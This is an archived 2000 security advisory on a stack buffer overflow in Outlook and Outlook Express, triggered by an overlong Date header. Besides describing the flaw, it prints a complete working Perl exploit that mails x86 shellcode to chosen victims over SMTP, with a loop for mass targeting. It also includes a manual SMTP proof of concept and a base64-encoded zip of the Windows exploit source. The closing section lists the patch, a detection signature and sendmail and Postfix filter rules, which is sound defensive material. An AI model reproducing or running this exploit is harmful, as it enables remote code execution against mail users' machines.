Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Windows Net Apps :: olook1~1.txt

Outlook - write arbitrary data to the stack




COMMAND

    Outlook

SYSTEMS AFFECTED

    Outlook Express 4.0, 4.01, 5.0, 5.01, Outlook 97, 98, 2000

PROBLEM

    Ussr Labs and Aaron  Drew both found the  same issue.  A  bug in a
    shared component  of Microsoft  Outlook and  Outlook Express  mail
    clients can  allow a  remote user  to write  arbitrary data to the
    stack.  This  bug has been  found to exist  in all versions  of MS
    Outlook and Outlook Express on  both Windows 95/98 and Windows  NT
    4.

    The vulnerability lies  in the parsing  of the GMT  section of the
    date field in the header of an email.  Bound checking on the token
    representing the  GMT is  not properly  handled.   This bug can be
    witnessed by opening  an email with  an exceptionally long  string
    directly preceding the GMT specification in the Date header  field
    such as:

        Date: Fri, 13 July 2000 14:16:06
        +1000xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

    The  bug  lies  in  the  shared  library INETCOMM.DLL and has been
    successfully exploited on Windows 95, 98 and NT with both  Outlook
    and Outlook Express.

    The execution  of this  code is  performed differently  under each
    client.   Under  Outlook  Express,  the  buffer overflow occurs as
    soon as the  user tries to  view the mail  folder containing email
    with  a  malicious  date  header.   Under  Microsoft  Outlook, the
    overflow  occurs  when  attempting  to  preview,  read,  reply  or
    forward any email with a malicious date header.  Under MS  Outlook
    a user may delete or save an email to disk without exploitation.

    Whilst some  mail transport  systems seem  to modify  8-bit header
    data  or  lines  over  70  characters  in length preventing direct
    exploitation, these restrictions seem to be avoided by encoding  a
    message  with  an  exploit  date  field  as a MIME attachment in a
    Outlook's  MIME  attached  message  format.   These  messages also
    overflow the stack when read, previewed, replied to or forwarded.

    A nice little feature about this buffer overflow is that the  mail
    is not deleted from the  server, and next time outlook  is loaded,
    it will try to download the mail, causing it to crash again.

    To test  this vulnerability  USSR telneted  to an  SMTP server and
    sent the following to themselves:

        HELO
        MAIL FROM: BILLGATES@MICROSOFT.COM
        RCPT TO: MY@EMAIL.COM
        DATA
        Date: Thu,13 Jun 2000 12:33:16
        +1111111111111111111111111111111111111111111111111111111111111
        (dot here)
        QUIT

    After the remote host closed  the connection and sent mail  to the
    appropriate address, upon receipt of the mail the following  fault
    was generated by Outlook:

        OUTLOOK caused an invalid page fault in
        module <unknown> at 00de:00aedc5a.
        Registers:
        EAX=80004005 CS=016f EIP=00aedc5a EFLGS=00010286
        EBX=70bd4899 SS=0177 ESP=0241ef94 EBP=31313131
        ECX=00000000 DS=0177 ESI=0241efc6 FS=2b57
        EDX=81c0500c ES=0177 EDI=0241efc4 GS=0000
        Bytes at CS:EIP:
        Stack dump:
        0241f360 0241f554 00000000 00000001 00000000 004580d0 00000054 00000054
        0241efc4 0000003b 00000100 00000017 3131312b 31313131 31313131 31313131

    Following code will create and  send an e-mail message, that  when
    downloaded by outlook, will open http://www.ussrback.com.

    Unix/Linux Perl Version:

        http://www.ussrback.com/outoutlook.pl

    Windows Console Version:

        http://www.ussrback.com/outoutlook.exe

    Windows Console Version Source:

        http://www.ussrback.com/outoutlook.zip

    Below  You  will  find  perl  version  and  mimed  Windows Console
    Versions source.  Perl code:

    #!/usr/bin/perl
    #******************************************************************************
    #http://www.ussrback.com Ussr Labs (Exploiteable Buffer Overflow)
    # Outlook Express 5.0 | Outlook 2000 | Outlook 97.0 | Outlook 98
    #******************************************************************************
    #
    # By: Ussr Labs
    #
    # Arbitary shellcode injector over SMTP
    # ./$0 -h <server hostname>  -m <mail>
    # ./dieoutlook.pl -h <smtp server> -m victim@address.com
    #
    #
    #
    #For Multiple email's Spanwn do something like this:
    #
    # for i in `cat emailshere.txt`; do perl ./outoutlook.pl -h smtpserverip -m $i; done
    #
    #
    #
    #

    use Getopt::Std;
    use Socket;
    getopt('h:m', \%args);

    # user defined variables
    if(defined($args{h})){$serv=$args{h}}else{&usage;}
    if(defined($args{m})){$rcpt=$args{m}}else{&usage;}

    # These are the escape characters which will cause the seg violation.
    # *nix didn't like the ascii interpretation, so we send the
    # characters in hex.
    # +,1 , ,^ , ,z , ,x

    $spawn = "\x2b\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" .
            "\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" .
            "\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" .
            "\x31\x31\x31\x31\x31\x31\x31\x31\x5a\xdc\xae\x20\x78\x0d\x0a";

    $shellcode = "\xE8\x00\x00\x00\x00\x5D\x81\xED\x40\x10\x40\x00\x81\xC4\x00" .
            "\x03\x00\x00\xB8\x38\x10\x00\x01\x8B\x00\x89\x85\x0B\x11\x40\x00" .
            "\x8C\xC8\xA8\x04\x75\x08\x8B\x85\x1F\x11\x40\x00\xEB\x06\x8B\x85" .
            "\x23\x11\x40\x00\x89\x85\x1F\x11\x40\x00\x8D\x8D\x42\x11\x40\x00" .
            "\x51\x50\xFF\x95\x0B\x11\x40\x00\x89\x85\x0F\x11\x40\x00\x8D\x8D" .
            "\x53\x11\x40\x00\x51\xFF\x95\x0F\x11\x40\x00\x8D\x8D\x34\x11\x40" .
            "\x00\x51\x50\xFF\x95\x0B\x11\x40\x00\x89\x85\x13\x11\x40\x00\x8B" .
            "\x85\x1F\x11\x40\x00\x8D\x8D\x27\x11\x40\x00\x51\x50\xFF\x95\x0B" .
            "\x11\x40\x00\x89\x85\x17\x11\x40\x00\x8D\x85\x1B\x11\x40\x00\x50" .
            "\x6A\x00\x6A\x00\x8D\x85\xE3\x10\x40\x00\x50\x6A\x00\x6A\x00\x8B" .
            "\x85\x17\x11\x40\x00\xFF\xD0\xEB\xFE\x60\xE8\x00\x00\x00\x00\x5D" .
            "\x81\xED\xE9\x10\x40\x00\x6A\x00\x6A\x00\x6A\x00\x8D\xB5\x5F\x11" .
            "\x40\x00\x56\x6A\x00\x6A\x00\xFF\x95\x13\x11\x40\x00\x61\xC2\x10" .
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" .
            "\x00\x00\x00\x00\x00\x00\x00\xF0\x77\x00\x00\xF7\xBF\x43\x72\x65" .
            "\x61\x74\x65\x54\x68\x72\x65\x61\x64\x00\x53\x68\x65\x6C\x6C\x45" .
            "\x78\x65\x63\x75\x74\x65\x41\x00\x47\x65\x74\x4D\x6F\x64\x75\x6C" .
            "\x65\x48\x61\x6E\x64\x6C\x65\x41\x00\x73\x68\x65\x6C\x6C\x33\x32" .
            "\x2E\x64\x6C\x6C\x00\x77\x77\x77\x2E\x75\x73\x73\x72\x62\x61\x63" .
            "\x6B\x2E\x63\x6F\x6D\x00";

    $ret = "00aedc5a";                                          # return address
    $nop = "\x90";                                                      # x86 NOP
    $port = 25;                                                 # default 25 SMTP port
    $buffsize = "1348";                                         # buffer size
    $buffer .= $nop x 945;                                              # load $buffer with 945 NOP then $shellcode
    $buffer .= $shellcode;                                              # append shellcode to buffer
    $offset = (hex $ret);                                               # return hex string to corresponding value
    $code = pack("N", $offset);                                 # big-endian (long) network order
    while (length $buffer < $buffsize) { $buffer .= $code; }
    $buffer .= "\n\n";
    print "$code\n";

    # create random MAIL FROM field. format is: [ alphanumeric ] @ [ characters ] . [ domain ]

    $max=(int rand 15);
    @a=('a'..'z', '1'..'10'); for (1..$max) { $str .= $a[rand @a] }
    @a=('a'..'z'); for (1..$max) { $host .= $a[rand @a] }
    @dom = ('.com', '.net', '.org');
    $rdom = $dom[ rand @dom ];
    $rmail = $str . "@" . $host . $dom;
    print "random address set to: $rmail\n";

    # random date method, format: Date: <day>, <int-day> <month> 2000 <time>

    @days = ('Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun');
    $rday = $days[ rand @days ];
    $rcal=(int rand(31));
    $rhour=(int rand(23)); if ($rhour < 10){ $rhour = "0".$rhour; }
    $rmin=(int rand(59)); if ($rmin < 10){ $rmin = "0".$rmin; }
    $rsec=(int rand(59)); if ($rsec < 10){ $rsec = "0".$rsec; }
    @months = ('Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Oct', 'Sep', 'Nov', 'Dec');
    $rmonth = $months[ rand @months ];
    $date = "Date: ".$rday.","; if ( $rcal >9 ){$date = $date."$rcal"." $rmonth"." 2000 ".$rhour.":".$rmin.":".$rsec," ";}
    else { $date = $date." $rcal"." $rmonth"." 2000 ".$rhour.":".$rmin.":".$rsec," ";}
    print "date set to: $date\n";

    $in_addr = (gethostbyname($serv))[4] || die("Error: $!\n");
    $paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n");
    $proto = getprotobyname('tcp') || die("Error: $!\n");

    socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
    connect(S, $paddr) || die("Error: $!\n");
    select(S); $| = 1; select(STDOUT);

    # begin our SMTP transaction

    print "now starting SMTP transaction\n";
    $res=<S>; print "$res\n";
    print "sending HELO\n";
    system("sleep 2s");
    print S "HELO\r\n";
    $res=<S>; print "$res\n";

    print "sending MAIL FROM\n";
    system("sleep 2s");
    print S "MAIL FROM:$rmail\r\n";
    $res=<S>; print "$res\n";

    print "sending RCPT\n";
    system("sleep 2s");
    print S "RCPT TO:$rcpt\r\n";
    $res=<S>; print "$res\n";

    print "sending DATA\n";
    system("sleep 2s");
    print S "DATA\r\n";
    $res=<S>; print "$res\n";

    print "sending escape characters\n";
    print S "$date";
    print S " $spawn";

    print "sending shellcode\n";
    print S "$shellcode\r\n\r\n\r\n";
    #$res=<S>; print "$res\n";
    print S ".\r\n";
    print S "QUIT\r\n";

    print "shellcode spawn was successful\n";
    close(S);

    sub usage {die("\n\n./$0 -h <hostname> -m <mail>\n\n");}

    Mimed source:

    ---
    Content-Type: application/octet-stream; name="outoutlk.zip"
    Content-Transfer-Encoding: base64
    Content-Disposition: inline; filename="outoutlk.zip"
    Content-MD5: RKXrs6kVv/BYUtduvsKVlA==

    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

    -----

    Even PGP  plugin for  MSIE (for  what else  too???) is vulnerable.
    Trying to build  a secure system  using insecure components  (e.g.
    Windows).

SOLUTION

    This  vulnerability  can  be  eliminated  by  taking  any  of  the
    following actions:

      - Installing the patch available at
        http://www.microsoft.com/windows/ie/download/critical/patch9.htm
      - Performing a default installation of Internet Explorer 5.01 Service Pack 1,
        http://www.microsoft.com/Windows/ie/download/ie501sp1.htm.
      - Performing a default installation of Internet Explorer 5.5  on
        any system except Windows 2000.

    The patch requires IE 4.01 SP2  or IE 5.01 to install.   Customers
    who install this patch on versions other than these may receive  a
    message reading "This update does not need to be installed on this
    system". This message is incorrect.  More information is available
    in KB article Q267884

    Detection  of  this  new  threat  with  conventional tools is very
    difficult.  To make  detection and filtering even  more difficult,
    some  conventional  methods  prevent  such  attacks  can easily be
    circumvented.

    Internet  Security  Systems  RealSecure  customers  can  use   the
    following  procedure  to  detect   and/or  kill  malicious   email
    traveling over SMTP:

        1. From  the View  menu, select  'Network Sensor  Policies' or
           'Network  Engine  Policies',  depending  on  the version of
           RealSecure you are using.
        2. Select your policy, and then click 'Customize...'.
        3. Click the 'User Defined Events' tab.
        4. Click 'Add' on the right hand side of the dialog box.
        5. Type  in  a  name  for  the  event,  such as 'Outlook  Date
           Overflow'.
        6. In the 'Context' field, select 'Email_Content'.
        7. In the 'String' field, type the following:
           ^Date: (.{50,50}|.*[^ -~]+)
        8. You may want to configure RealSecure to kill the connection
           by  editing  the  'Response'  field  to  include the RSKILL
           action.
        9. Click 'Save', and then click 'Close'.
       10. Click 'Apply to Sensor' or 'Apply to Engine', depending  on
           the version of RealSecure you are using.

    RealSecure will  now detect  messages with  a Date:  field that is
    longer than  50 characters,  or if  it contains  any non-printable
    characters (not between ASCII 0x20 and 0x7E, space, or tilde).  It
    is possible  for this  signature to  false positive  if there is a
    line in your  e-mail that starts  with "date: ",  and at least  50
    characters  or  any  non-printable  characters  or  extended ASCII
    characters on the same  line after it.   If you have a  high false
    positive rate,  increase both  numbers in  the regular  expression
    from 50 to 70.

    Here's the Sendmail filter rule to stop Outlook exploit.  Also on

        http://www.cetis.hvu.nl/~koos/outlookoverflow.txt

    with tabs in the right places:

    #
    # this is a filter to make sendmail reject messages with Date: headers
    # that are too long. This is used in the latest Outlook exploit.
    #
    # You NEED:
    # - a sendmail that understands regex maps. I had to specially compile this
    #   into 8.11 ! Add to sendmail-8.11.0/devtools/Site/site.config.m4
    #   define(`confMAPDEF',`-DMAP_REGEX') and rebuild from scratch
    #
    # The filter simply rejects messages with a date header longer (total!)
    # then 60 chars
    #
    # Then add this part to your .mc file in the different areas and regenerate
    # your .cf file
    #
    # 2000-07-21 Originally written
    #
    # if you cut and paste this:
    # tabs are in use in the '^R' lines
    #
    # Koos van den Hout
    # http://www.cetis.hvu.nl/~koos/
    # http://www.virtualbookcase.com/
    #

    LOCAL_CONFIG
    Klinetoolong regex -a@MATCH ^.{60,}$

    LOCAL_RULESETS
    HDate: $>+CheckDate

    SCheckDate
    R$*                         $: $(linetoolong $1 $)
    R@MATCHi            $#error $: 553 Date Header too long error
    R$*i                        $@ OK

    With a little help from Koos  van den Hout Mark Lastdrager made  a
    small header_check for Postfix  to prevent people from  exploiting
    the latest Outlook  bug.  A  quick test shows  it works but  don't
    come complaining when it doesn't.  In your main.cf put this line:

        header_checks = regexp:/etc/postfix/header_checks

    (path  depends   on  where   your  postfix   config  lives).    In
    header_checks put:

        /^Date:.{60,}$/ REJECT

    This will reject messages with a date line longer than 60 chars.
    Don't forget postfix reload.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH